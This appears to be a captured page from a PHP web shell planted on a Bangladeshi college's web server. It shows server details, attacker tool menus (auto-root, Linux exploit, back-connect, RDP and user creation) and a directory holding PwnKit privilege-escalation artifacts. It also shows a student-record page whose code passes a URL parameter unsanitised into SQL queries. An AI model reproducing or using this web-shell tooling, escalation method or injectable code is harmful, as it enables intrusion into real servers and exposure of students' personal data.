Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
public_html /
data /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxrwxrwx
adminloginpanel
[ DIR ]
drwxrwxrwx
admission
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
db_connect
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
studentsportal
[ DIR ]
drwxrwxrwx
.htaccess
489
B
-rw-rw-rw-
.mad-root
0
B
-rw-r--r--
SHOWAllResult.php
19.52
KB
-rw-rw-rw-
check_compolsary_subject.php
893
B
-rw-rw-rw-
check_grou_name.php
768
B
-rw-rw-rw-
check_optional_subject.php
863
B
-rw-rw-rw-
check_selective_subject.php
878
B
-rw-rw-rw-
index.php
48
B
-rw-rw-rw-
jquery-1.11.3.min.js
91.36
KB
-rw-rw-rw-
logo.png
70.27
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
save_reg_info_1.php
6.82
KB
-rw-rw-rw-
showResult.php
11.59
KB
-rw-rw-rw-
std_info_1.php
36.8
KB
-rw-rw-rw-
stdpic.png
3.48
KB
-rw-rw-rw-
view_students_details.php
12.09
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view_students_details.php
<?php error_reporting(0); @session_start(); @date_default_timezone_set('Asia/Dhaka'); require_once("db_connect/config.php"); require_once("db_connect/conect.php"); $db = new database(); $id=$_GET['id']; if(isset($id)) { $data = $db->link->query("SELECT `online_reg_std_info`.*,`add_class`.`class_name` FROM `online_reg_std_info` INNER JOIN `add_class` ON `add_class`.`id`=`online_reg_std_info`.`class` WHERE `online_reg_std_info`.`id`='".$_GET['id']."'"); if($fetch = $data->fetch_array()) { $id=$fetch[0]; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>ভর্তি ফরম</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+Bengali:wght@100;200;300;400;500;600;700;800;900&display=swap" rel="stylesheet"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous"> <style type="text/css"> @media print{ .printbtn{ display:none; } } body{ font-family: 'Noto Sans Bengali', sans-serif !important; } </style> <style> body{ font-family: 'Noto Serif Bengali', serif; } *{ padding: 0px; margin: 0px; } table td{ border : 1px solid black; padding : 5px 3px; border-collapse : collapse; } </style> </head> <body style="font-size:14px; background:#f4f4f4;"> <div style="width: 750px; margin: auto;background:#fff; "> <table class="table table-bordered" > <tr> <td style="padding:0px !important;"> <table width="100%" cellspacing="0" cellpadding="0" > <tr> <td style="border:none !important;" width="15%" align="center"><img src="logo.png" style="height:120px; padding: 5px;"> </td> <td style="border:none !important;" align="center"> <p style="font-size:28px;"> Govt. Zia Mohila College </p> <span style="font-size:18px;">Shahid Shahidullah Kaisar Road, Feni. </span> <p style="font-size:12px;">www.gzmcfeni.gov.bd, info@gzmcfeni.gov.com</p> </td> <td style="border:none !important;" align="center" width="15%"></td> </tr> </table> </td> </tr> <tr> <td align="center"> <table width="100%" cellspacing="0" cellpadding="0" align="center" > <tr> <td align="left"> Roll No. : <?php print $fetch['roll']?> </td> <td align="center"><b> Session: <?php print $fetch['session']?> </b> </td> <td> Class: <?php print $fetch['class_name']?></td> </tr> </table> </td> </tr> <tr> <td style="padding:3px !important;"> <table width="100%" cellspacing="0" cellpadding="0" align="center" > <tr> <td style="width:160px;"> Student's Name : </td> <td colspan="3" style="text-transform:uppercase;"> <?php print $fetch['name_en']?></td> <td rowspan="3" width="150" align="center"><img src="stdpic.png" style="height:100px; padding: 5px;"></td> </tr> <tr> <td>Date of Birth :</td> <td style="width:200px;"> <?php print $fetch['date_of_birth'] ?></td> <td>Religion :</td> <td style="width:100px;"> <?php print $fetch['religion']?> </td> </tr> <tr> <td>Student's Mobile No. :</td> <td colspan="3"> <?php print $fetch['std_mobile'] ?></td> </tr> </table> <table width="100%" cellspacing="0" cellpadding="0" align="center" > <tr> <td>Father's Name : </td> <td style="width:200px;"> <?php print $fetch['fathers_name_en']?></td> <td>Mobile No. :</td> <td> <?php print $fetch['father_phone']?></td> </tr> <tr> <td>Mother's Name : </td> <td colspan="3"> <?php print $fetch['mothers_name_en']?></td> </tr> <!-- ............. Mothers Info........................ --> <tr> <td colspan="6" height="20" >Guardian's Info :</td> </tr> <tr> <td>Guardian's Name :</td> <td colspan="3"> <?php print $fetch['guardian_name_en']?></td> </tr> <tr> <td>Relation with Student :</td> <td> <?php print $fetch['relation_with_std']?></td> <td>Mobile No. :</td> <td> <?php print $fetch['guardian_mobile']?></td> </tr> <tr> <td colspan="4" > Address: <br></td> </tr> <tr> <td>House Name : </td> <td colspan="3" ><?php print $fetch['pa_home_name']?></td> </tr> <tr> <td>Vill. : <?php print $fetch['pa_village']?></td> <td>P.O. : <?php print $fetch['pa_post_office']?></td> <td>Upozila : <?php print $fetch['pa_upazila']?></td> <td>District : <?php print $fetch['pa_district']?></td> </tr> </table> <br><br> </td> </tr> </table> <table width="100%" cellspacing="0" cellpadding="0" align="center" > <tr> <td colspan="3" align="center"> <span style="font-size:16px"> <b>Subject Name</b> </span></td> </tr> <tr> <?php $sqltype=$db->link->query("SELECT `add_subject_info`.`select_subject_type` FROM `online_subject_registration_table` INNER JOIN `add_subject_info` ON `add_subject_info`.`id`=`online_subject_registration_table`.`subject_id` WHERE `std_id`='$id' GROUP BY `add_subject_info`.`select_subject_type`"); while($fetch_type=$sqltype->fetch_array()) {?> <td valign="top" > <b> <?php if($fetch_type[0]=="CompulsorySubject") { print "Compulsory Subject"; } else if($fetch_type[0]=="GroupSubject") { print "Group Subject"; } else { print "Optional Subject"; } print '</b><br> '; $selectSub=$db->link->query("SELECT `subject_name` FROM `online_subject_registration_table` INNER JOIN `add_subject_info` ON `add_subject_info`.`id`=`online_subject_registration_table`.`subject_id` WHERE `std_id`='$id' AND `add_subject_info`.`select_subject_type`='$fetch_type[0]'"); while($fetch_sub=$selectSub->fetch_array()) { print '<span style="text-transform:uppercase;">'.$fetch_sub[0].', </span><br>'; } ?> </td> <?php } ?> </tr> </table> </div> </body> </html> <?php } } ?>
Close